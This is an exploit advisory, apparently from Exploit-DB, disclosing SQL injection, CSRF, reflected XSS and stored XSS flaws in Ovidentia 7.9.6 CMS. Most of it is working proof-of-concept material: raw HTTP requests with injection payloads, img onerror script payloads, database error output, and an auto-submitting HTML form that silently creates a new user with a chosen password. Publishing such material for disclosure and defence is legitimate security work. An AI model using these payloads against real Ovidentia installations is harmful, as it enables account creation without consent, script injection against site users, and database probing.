Ovidentia 7.9.6 - Multiple Vulnerabilities

EDB-ID:

30107

CVE:

N/A


Author:

sajith

Type:

webapps


Platform:

PHP

Date:

2013-12-08


###########################################################
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] version: Ovidentia 7.9.6
[~]Vendor Homepage: http://www.ovidentia.org/
[~] vulnerable app link:http://www.ovidentia.org/telecharger
###########################################################

[1]SQL injection vulnerability


Log into admin panel and access delegate functionality > managing
 administrators where &id parameter (shown below link) is vulnerable to sql
injection

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1

POC by sajith shetty:

request:

GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=

response:

style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.



[2]CSRF vulnerability

log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.

<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]"
value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>




[3]Reflected XSS

http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x
onerror=prompt(1);>

request:

GET
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95


response:

 <div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a> 
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->



[4]Stored xss

log into the admin portal and access mail functionlity and create new
domain using link below


http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y

here Name & Description field is vulnerable to stored XSS .payload:"><img
src=x onerror=prompt(1);>



request:


POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen


response:
<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img
src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>